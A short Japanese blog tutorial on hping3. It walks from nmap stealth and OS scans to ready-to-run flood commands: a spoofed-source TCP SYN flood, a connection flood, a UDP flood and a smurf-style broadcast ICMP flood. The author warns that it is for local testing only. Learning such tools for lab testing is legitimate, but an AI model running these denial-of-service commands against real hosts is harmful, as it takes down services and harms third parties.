2016年10月31日月曜日

hping3の使い方

これから記載する内容については、絶対に外部ではやらないでください。
そして、何かあっても、当ブログ主は一切責任を負いませんので、あくまでも自己責任の範疇で、かつローカルで影響のない環境内でのみテストをされてみてください。

前提.
・TCPのスリーウェイハンドシェイクが理解できていること。  こちらに参考情報があります
・root権限で実行すること

手順1.
ステルススキャンを実施
#nmap -v -sS 対象ホスト名(またはドメイン)
詳しくは、こちら

手順2.
開いているポートを見つけたら、どんなOSかちょっと見てみましょう。
#nmap -v -O 対象ホスト名(またはドメイン)

手順3.
さて、どのポートが開いているかにより、次のいずれかを選択して実行するとテストができます。

(1)TCPの場合
a)TCP SYN Flood
#hping3 --rand-source -S -L 0 -p 対象ポート番号 対象IP

b)TCP Connection Flood
#hping3 -a -SAFRU -L 0 -M 0 -p 対象ポート番号 対象ホスト名 --flood

(2)UDPの場合
UDP Flood
#hping3 --rand-source --udp 対象IP --flood

(3)ping echoが返ってきた場合
ICMP Flood
#hping3 --icmp --spoof 対象IP ブロードキャスト・アドレス --flood

hping3の使い方は非常に奥が深いので、引き続き記載して行きたいと思います。

※悪用は決してしないでください。

0 件のコメント: